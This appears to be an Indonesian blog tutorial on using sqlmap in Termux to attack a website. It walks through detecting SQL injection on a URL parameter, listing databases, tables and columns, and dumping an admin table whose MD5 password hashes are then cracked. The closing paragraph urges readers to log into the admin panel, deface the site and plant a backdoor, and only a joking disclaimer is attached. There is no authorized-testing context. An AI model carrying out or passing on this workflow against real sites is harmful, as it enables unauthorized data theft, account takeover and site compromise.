Tutorial Sql Injection dengan SqlMap Di Termux


Hai gays setelah kemarain mimin share cara install sqlmap di termux kali ini mimin bakal kasih tau cara pakainya :v untuk tutorial kali ini mohon untuk tidak disalahgunakan ok :3 kalo ada apa-apa sama kalian resiko ditanggung sendiri mimin gak tanggung jawab hwhwh :v btw mungkin ada yang belum tau apa itu sqlmap , sedikit penjelasan sqlmap adalah sebuah tools gratis(opensource) yang  dapat mendeteksi dan mengeksploitasi sebuah celah sql injection secara otomatis. Serangan sql injection ini memungkinakan seorang attacker untuk memanipulasi maupun mengambil data yang ada di database disebuah server. okelah tidak usah berlama-lama langsung saja ke tutorialnya cekidot :v

1. Buka termux kalian
2. Masuk ke Directory sqlmap, ketik cd sqlmap

3. Ketik python2 sqlmap.py -u "http://target.co.li/news.php?id=7" untuk mengetahui site yang kalian masukkan apakah parameternya rentan terhadap sql injection atau tidak

4. Jika kita sudah mengetahui jika site yang kita masukkan rentan terhadap sql injection dan dapat di eksploitasi, langkah berikutnya ialah mencari tau nama databasenya , masukkan perintah python2 sqlmap.py -u "http://target.co.li/news.php?id=7" --dbs

5. Selanjutnya dalah mengetahui tabel apa saja yang data di database tersebut, caranya ketik python2 sqlmap.py -u "http://target.co.li/news.php?id=7" --tables -D nama_database

6. Berikutnya yaitu mencari tahu struktur sebuah tabel , caranya ketik python2 sqlmap.py -u "http://target.co.li/news.php?id=7" --columns -D nama_database -T nama_tabel


7.Jika sudah mengetahui struktur dari tabel , selanjutnya kita coba untuk melakukan ekstraksi/mengambil data dari dalam tabel , masukkan perintah python2 sqlmap.py -u "http://target.co.li/news.php?id=7" --dump -D nama_database -T nama_table


8. Disini saya menemukan data admin dari sebuah situs,terdapat data password yang hash nya adalah MD5 jadi saya akan mencoba melakukan cracking terhadap password yang ada ditabel tersebut , hasilnya seperti ini


Nah itu tadi cara menggunakan tools sqlmap di termux , untuk kalian yang ingin melakukan sesuatu terhadap site nya misalkan melakukan defacing kalian tinggal mencari admin panel dan login menggunakan username serta password yang sudah didapatkan, setelah login kalian mungkin bisa menanam sebuah backdor di dalamnya Ingat sekali lagi resiko apapun ditanggung sendiri , Be a smart people , tetap semangat dan terus berkarya , See you next Time

Posting Komentar

0 Komentar